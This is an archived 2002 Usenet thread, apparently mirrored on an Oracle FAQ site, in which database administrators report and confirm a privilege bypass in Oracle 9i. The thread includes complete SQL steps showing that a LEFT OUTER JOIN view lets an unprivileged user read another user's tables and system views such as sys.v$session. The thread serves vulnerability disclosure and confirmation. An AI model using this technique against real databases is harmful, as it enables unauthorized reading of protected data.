| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Usenet -> c.d.o.server -> Re: 9iDB Security Hole?
Confirmed with 9.0.1.0.0 on Linux
Confirmed with 9.0.1.0.0 on Solaris
Also confirmed with system views on both...
SQL > desc sys.v$session;
ERROR:
ORA-04043: object sys.v$session does not exist
SQL > desc sys.v$lock;
ERROR:
ORA-04043: object sys.v$lock does not exist
SQL > select v$session.sid from sys.v$lock left outer join sys.v$session on v$lock.sid = v$session.sid;
SID
2
...
Richard Kuhler
"Vladimir M. Zakharychev" wrote:
>
> Anyone with 9i can confirm this?
>
> From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> ...relcom.comp.dbms.oracle
>
> connect system/****@database
> CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> Grant Create Session To us1;
> Grant Create Session To us2;
> Grant Create Table To us1;
> grant unlimited tablespace to us1;
> Grant Create View To us2;
>
> Connect us1/us11_at_database;
> Create Table t1(c1 Number(1));
> Insert Into t1(c1) Values(9);
> Create Table t2(c1 Number(1));
> Insert Into t2(c1) Values(9);
>
> commit;
> Connect us2/us11_at_database;
>
> SQL> Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- this is expected
> SQL> Select * From us1.t2;
> ORA-00942: table or view does not exist
> -- this one too
> SQL> Create View aa As Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- and this one
> SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
> >From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
>
> View created
> -- now this one is NOT !!!!!
> SQL> select * from aa;
>
> T1_C1 T2_C1
> ---- ----
> 9 9
>
> This effectively means that LEFT OUTER JOIN allows to create views
> on tables that are normally not visible (provided that unprivileged user
> knows table and column names).
> If you can confirm this basic example, can you also try it on system
> catalog tables/views? If you can not confirm, please specify your version
> and platform so that we know which ones are not affected (poster didn't
> specify version, but I suggest it's 9.0.1.1 on either NT or Linux).
>
> --
> Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> All opinions are mine and do not necessarily go in line with those of my employer.
Received on Mon Apr 15 2002 - 12:47:22 CDT
 |
 |